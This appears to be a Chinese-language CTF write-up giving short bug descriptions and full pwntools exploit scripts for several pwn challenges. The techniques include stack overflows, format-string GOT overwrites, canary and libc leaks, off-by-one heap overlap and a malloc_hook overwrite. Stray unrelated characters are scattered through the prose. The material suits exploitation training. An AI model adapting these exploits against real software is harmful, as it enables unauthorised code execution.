最簡單的pwn
- nc然后cat flag
pwn3
- 64位棧溢出,程序有后門囱井,棧溢出然后return到后門即可
from pwn import *
p = process('./pwn3')
p.recvuntil(' something?\n')
payload = 'a'*0x30 + 'bbbbbbbb' + p64(0x400751)
p.sendline(payload)
p.interactive()
pwn7
- 32位教科書棧溢出驹尼,先利用write函數(shù)泄漏libc地址,然后得到system和binsh地址庞呕,最后再system('/bin/sh\x00')
from pwn import *
context.log_level = 'debug'
p = process('./pwn7')
elf = ELF('./pwn7')
write_plt = elf.plt['write']
read_plt = elf.plt['read']
write_got = elf.got['write']
p.recvuntil('your name:\n')
payload = 'a'*0x24 + 'bbbb' + p32(write_plt) + p32(0x0804846B)
payload += p32(1) + p32(write_got) + p32(4)
p.sendline(payload)
write_addr = u32(p.recv(4))
log.success('write addr : 0x%x'%write_addr)
offset_write = 0x000d43c0
offset_system = 0x0003a940
offset_str_bin_sh = 0x15902b
libc_base = write_addr - offset_write
system_addr = libc_base + offset_system
binsh_addr = libc_base + offset_str_bin_sh
payload = 'a'*0x24 + 'bbbb' + p32(system_addr) + p32(0xdeadbeef)
payload += p32(binsh_addr)
p.sendline(payload)
p.interactive()
pwn11
- 首先程序是個比較簡單的32位elf新翎,是個猜數(shù)字游戲
- 漏洞點在read_name函數(shù)有個整數(shù)溢出,v2為有符號數(shù),而for循環(huán)中i為無符號數(shù)料祠,所以當有符號數(shù)與無符號數(shù)比較時骆捧,會將有符號數(shù)強制轉(zhuǎn)換成無符號數(shù)澎羞,當輸入-1時髓绽,v2在比較中就變成了最大的正數(shù),因此可以棧溢出
- 程序正好有個后門妆绞,直接棧溢出執(zhí)行后門即可得到flag
from pwn import *
context.log_level = 'debug'
p = process('./f4n_pwn')
p.recvuntil('length : ')
p.sendline('-1')
payload = 'a'*0x57 + p32(0x080486BB)
p.recvuntil('name : \n')
p.sendline(payload)
p.interactive()
pwn9
- 棧的格式化字符串漏洞顺呕,只有一次機會,由于程序開了canary括饶,所以可以將__stack_chk_fail@got改成后門地址株茶,當棧溢出時程序執(zhí)行__stack_chk_fail函數(shù)既能getshell
from pwn import *
context.log_level = 'debug'
p = process('./babyfmt')
elf = ELF('./babyfmt')
stack_chk_fail_got = elf.got['__stack_chk_fail']
#gdb.attach(p)
payload = 'aaaaa%1569d%8$hn' + p64(stack_chk_fail_got)
payload += 'a'*0x60
p.sendline(payload)
p.interactive()
pwn4
- 棧溢出漏洞,程序有system函數(shù)图焰,但是沒binsh启盛,但是有$0,system($0)可以getshell(略坑)
from pwn import *
context.log_level = 'debug'
p = process('./pwn4')
elf = ELF('./pwn4')
read_plt = elf.plt['read']
read_got = elf.got['read']
system = elf.plt['system']
pop_ret = 0x4007d3
binsh_addr = 0x60111F
p.recvuntil('pwn me\n')
payload = 'a'*0x10 + 'bbbbbbbb' + p64(pop_ret) + p64(binsh_addr) + p64(system)
p.sendline(payload)
p.interactive()
pwn5
- 棧上格式化漏洞配合棧溢出漏洞技羔,首先利用格式化泄漏libc地址僵闯,然后棧溢出執(zhí)行system('/bin/sh\x00')
可以得到__libc_start_main_ret地址的偏移為 0x28/8.0 + 6 (64位elf前6個參數(shù)為寄存器傳參) = 11,然后泄漏libc藤滥,得到system和sh的地址
想到棧溢出需要繞過循環(huán)鳖粟,循環(huán)中判斷輸入是否為"鴿子","真香"的母串拙绊,于是輸入中需要有這兩個詞才能ret到system函數(shù)否則直接退出
#coding:utf-8
from pwn import *
context.log_level = 'debug'
p = process('./human')
p.recvuntil('\n\n')
p.sendline('%11$p')
libc_start_main_ret = int(p.recvuntil('\n',drop=True)[2:],16)
log.success('__libc_start_main_ret : 0x%x'%libc_start_main_ret)
offset___libc_start_main_ret = 0x20830
offset_system = 0x0000000000045390
offset_str_bin_sh = 0x18cd57
libc_base = libc_start_main_ret - offset___libc_start_main_ret
system_addr = libc_base + offset_system
binsh_addr = libc_base + offset_str_bin_sh
pop_rdi = 0x400933
gdb.attach(p)
payload = 'a鴿子' + 'a'
payload += '真香' + '\x00'
payload = payload.ljust(0x20,'a')
payload += 'bbbbbbbb' + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)
p.recvuntil('?\n')
p.sendline(payload)
p.interactive()
pwn6
- edit函數(shù)存在off by one向图,可以修改next chunk的size,然后chunk overlapping控制下一堆塊的內(nèi)容标沪,然后修改指針榄攀,泄漏地址以及改free_got為system地址,具體可參照hitcon training lab13
from pwn import *
context.log_level = 'debug'
def write(size,content):
p.recvuntil('choice :')
p.sendline('1')
p.recvuntil('note :')
p.sendline(str(size))
p.recvuntil('note:')
p.sendline(content)
def edit(id,content):
p.recvuntil('choice :')
p.sendline('2')
p.recvuntil(' note :')
p.sendline(str(id))
p.recvuntil('note : ')
p.sendline(content)
def show(id):
p.recvuntil('choice :')
p.sendline('3')
p.recvuntil('note :')
p.sendline(str(id))
def delete(id):
p.recvuntil('choice :')
p.sendline('4')
p.recvuntil('note :')
p.sendline(str(id))
def quit():
p.recvuntil('choice :')
p.sendline('5')
p = process('./heap1')
elf = ELF('./heap1')
free_got = elf.got['free']
write(0x18,'a'*0x10) #0
write(0x10,'b'*0x10) #1
write(0x10,'/bin/sh\x00') #2
edit(0,'a'*0x18 + '\x61')
delete(1)
write(0x50,'ddddd') #1
edit(1,'d'*0x18+p64(0x21)+p64(0x50)+p64(free_got))
# leak freeaddr
show(1)
p.recvuntil("Content : ")
data = p.recvuntil("Done !")
free_addr = u64(data.split("\n")[0].ljust(8, "\x00"))
offset_free = 0x00000000000844f0
offset_system = 0x0000000000045390
libc_base = free_addr - offset_free
log.success('libc base addr: ' + hex(libc_base))
system_addr = libc_base + offset_system
#gdb.attach(p)
edit(1,p64(system_addr))
delete(2)
p.interactive()
read_note
- 棧溢出漏洞金句,但是開了canary和pie檩赢,所以我們先要利用puts函數(shù)泄漏canary,elf_base趴梢,和libc_base漠畜,然后ret到system('/bin/sh\x00')
from pwn import *
context.log_level = 'debug'
p = process('./read_note')
#leak canary
p.recvuntil('path:\n')
p.sendline('flag')
p.recvuntil(' len:\n')
p.sendline(str(0x300))
p.recvuntil('note:\n')
p.send('a'*0x259)
p.recvuntil('a'*0x259)
canary = u64(p.recv(7).rjust(8,'\x00'))
ebp = u64(p.recv(6).ljust(8,'\x00'))
log.success('canary : 0x%x'%canary)
log.success('ebp : 0x%x'%ebp)
p.recvuntil('s 624)\n')
p.send('a'*0x258 + p64(canary) + p64(ebp) + '\x20' )
#leak elf_base
p.recvuntil('path:\n')
p.sendline('flag')
p.recvuntil(' len:\n')
p.sendline(str(0x300))
p.recvuntil('note:\n')
p.send('a'*0x268)
p.recvuntil('a'*0x268)
elf_base = u64(p.recv(6).ljust(8,'\x00')) - 0xd2e
log.success('elf_base : 0x%x'%elf_base)
p.recvuntil('s 624)\n')
p.send('a'*0x258 + p64(canary) + p64(ebp) + '\x20' )
# #leak libc
p.recvuntil('path:\n')
p.sendline('flag')
p.recvuntil(' len:\n')
p.sendline(str(0x300))
p.recvuntil('note:\n')
p.send('a'*0x288)
p.recvuntil('a'*0x288)
libc_base = u64(p.recv(6).ljust(8,'\x00')) - 0x20830
log.success('libc_base : 0x%x'%libc_base)
offset_system = 0x0000000000045390
offset_str_bin_sh = 0x18cd57
system_addr = libc_base + offset_system
binsh_addr = libc_base + offset_str_bin_sh
pop_ret = elf_base + 0xe03
p.recvuntil('s 624)\n')
payload = 'a'*0x258 + p64(canary) + p64(ebp) + p64(elf_base+0xd20)
p.send(payload)
# #leak libc
p.recvuntil('path:\n')
p.sendline('flag')
p.recvuntil(' len:\n')
p.sendline(str(0x300))
p.recvuntil('note:\n')
p.send('a'*0x258 + p64(canary) + p64(ebp) + p64(pop_ret) + p64(binsh_addr) + p64(system_addr) )
#gdb.attach(p)
p.recvuntil('s 624)\n')
payload = 'a'
p.send(payload)
p.interactive()
pwn10
- 有個堆溢出漏洞,通過構(gòu)造small bins坞靶,然后溢出修改next chunk的pre size和size然后利用前向合并得到正在使用的堆塊憔狞,然后通過unsorted bin泄漏libc,再修改malloc_hook為one_gadget
from pwn import *
#context.log_level = 'debug'
def create(size):
p.recvuntil('choice:>\n')
p.sendline('1')
p.recvuntil('length: \n')
p.sendline(str(size))
p.recvuntil('y/n)\n')
p.sendline('n')
def write(index,size,data):
p.recvuntil('choice:>\n')
p.sendline('2')
p.recvuntil('write: ')
p.sendline(str(index))
p.recvuntil('write: ')
p.sendline(str(size))
p.recvuntil('write:\n')
p.send(data)
def view(index):
p.recvuntil('choice:>\n')
p.sendline('4')
p.recvuntil('look: ')
p.sendline(str(index))
def delete(index):
p.recvuntil('choice:>\n')
p.sendline('3')
p.recvuntil('delete: ')
p.sendline(str(index))
p = process('./diary')
create(0x10) #0
create(0x80) #1
write(0,0x6,'aaaa')
create(0x80) #2
create(0x80) #3
create(0x60) #4
create(0x60) #5
create(0x10) #6
delete(1)
payload = p64(0)*16 + p64(0x120) + p64(0x90)
write(2,len(payload),payload)
delete(3)
create(0x80) #1
view(2)
p.recvuntil('---\n')
libc_base = u64(p.recv(8)) - 88 - 0x3c4b20
log.success('libc_base : 0x%x'%libc_base)
malloc_hook = libc_base + 0x3c4b10
log.success('malloc_hook : 0x%x'%malloc_hook)
one_gadget = libc_base + 0x4526a
delete(5)
payload = p64(0)*12 + p64(0) + p64(0x71) + p64(malloc_hook-0x23)
write(4,len(payload),payload)
create(0x60) #3
create(0x60) #5
payload = 'a'*0x13+p64(one_gadget)
write(5,len(payload),payload)
p.recvuntil('choice:>\n')
p.sendline('1')
p.recvuntil('length: \n')
p.sendline('20')
#gdb.attach(p)
p.interactive()
